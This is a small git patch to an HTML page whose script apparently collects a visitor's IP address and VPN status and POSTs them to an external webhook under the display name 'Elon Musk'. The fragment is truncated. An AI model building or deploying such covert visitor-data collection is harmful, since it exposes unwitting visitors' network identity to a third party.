From 304c612a7a697c31e36bc2f7537817d9cd02eb1c Mon Sep 17 00:00:00 2001 From: Boof <97455552+hexahigh@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:09:52 +0100 Subject: [PATCH] fix --- Other/XYgu/index.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Other/XYgu/index.html b/Other/XYgu/index.html index a4f0128..c4c6cb2 100644 --- a/Other/XYgu/index.html +++ b/Other/XYgu/index.html @@ -26,8 +26,8 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g const request = new XMLHttpRequest(); request.open("POST", webhook); request.setRequestHeader('Content-type', 'application/json'); - var usedvpn2 = document.getElementById("usedvpn").value = usedvpn; - var userip2 = document.getElementById("userip").value = userip; + var usedvpn2 = document.getElementById("usedvpn").value + var userip2 = document.getElementById("userip").value var params = { username: "Elon Musk", avatar_url: "",